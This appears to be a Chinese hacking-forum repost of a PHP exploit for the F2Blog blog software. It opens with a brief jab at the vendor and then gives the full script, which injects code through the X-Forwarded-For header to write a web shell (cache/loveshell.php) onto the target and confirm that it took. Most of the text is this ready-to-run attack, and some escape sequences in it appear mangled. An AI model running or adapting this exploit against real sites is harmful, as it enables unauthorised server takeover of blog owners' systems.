来源:Loveshell
官方的人好牛啊,呵呵,硬要说程序没问题,服务器有问题,不鸟啦~~~~~
不过 后台做得实在很好
Exp 拿来 YY一下,顺便说句,漏洞不只这一个挖
<?php
print_r("
+------------------------------------------------------------------+
Exploit For F2Blog All Version
BY Mokfly 媒婆X 拖鞋王子
Just For Fun :)
+------------------------------------------------------------------+
");
ini_set("max_execution_time",0);
error_reporting(7);
$blogpath="$argv[2]";
$server="$argv[1]";
$cookie='';
$shell= "http://".$server.$blogpath."cache/loveshell.php";
$evilcode="fputs(fopen('cache/loveshell.php','w+'),'<[email protected](/$_REQUEST[c])?>Orz')";
$evilcode="'));".$evilcode.";/*";
$evilip="X-Forwarded-For: ".$evilcode;
preg_match('/X-Powered-By: php//(.+)/r/n/ie',send(""),$php);
echo "We Got php version:/t".$php[1]."/r/n";
send("");
$evilip="";
send("");
if(@file_get_contents($shell)=='Orz')
{
echo "Expoilt Success!/t/r/n";
echo "View Your shell:/t$shell";
}
else die("Faild!/r/n");
function send($cmd)
{
global $blogpath,$server,$cookie,$count,$useragent,$debug,$evilip;
$path=$blogpath."index.php";
$message = "POST ".$path." HTTP/1.1/r/n";
$message .= "Accept: */*/r/n";
$message .= "Accept-Language: zh-cn/r/n";
$message .= "Referer: http://".$server.$path."/r/n";
$message .= "Content-Type: application/x-www-form-urlencoded/r/n";
$message .= "User-Agent: ".$useragent."/r/n";
$message .= "Host: ".$server."/r/n";
$message .= "Content-length: ".strlen($cmd)."/r/n";
$message .= "Connection: Keep-Alive/r/n";
$message .= "Cookie: ".$cookie."/r/n";
$message .= $evilip."/r/n";
$message .= "/r/n";
$message .= $cmd."/r/n";
echo $message;
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
// echo $resp;
return $resp;
}
?>
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论